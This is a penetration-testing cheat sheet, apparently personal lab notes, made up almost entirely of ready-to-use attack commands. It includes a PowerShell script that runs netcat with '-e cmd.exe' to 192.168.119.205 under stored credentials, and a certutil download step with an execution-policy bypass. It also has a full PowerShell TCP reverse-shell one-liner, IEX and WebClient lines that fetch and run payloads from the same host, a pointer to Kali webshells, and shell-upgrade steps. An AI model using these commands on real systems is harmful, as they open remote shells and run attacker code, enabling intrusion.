# Run ps1 file as user

Filename run.ps1  

~~~
$user = 'FQDN\username'
$pass = 'password'
$password = ConvertTo-SecureString -AsPlainText $pass -Force
$SecureString = $password
$creds = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,$SecureString
$nc = 'C:\users\public\nc.exe'
Start-Process -FilePath $nc -ArgumentList ('192.168.119.205 81', '-e cmd.exe') -Credential $creds (edited) 
~~~

download file to computer  
certutil.exe -urlcache -split -f "http://192.168.119.205/run.ps1" run.ps1  

then execute with  
powershell -ExecutionPolicy UnRestricted -File run.ps1  


# Powershell

Reverse shell oneliner reverse shell  
`powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.205',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
`

Run file from web in memory  
`IEX(New-Object Net.WebClient).DownloadString("http://192.168.119.205/PAYLOAD.exe")`


Download file and save on disk  
`-NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('http://192.168.119.205/nc.exe' , 'C:\Python27\nc.exe')`


# Webshells

Webshells already in kali linux  
```bash
tree /usr/share/webshells/
```

# Python shell upgrade

```bash
python -c 'import pty; pty.spawn("/bin/bash")'

python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl + z
stty raw -echo
fg
<ENTER>
<ENTER>
export TERM=xterm
```
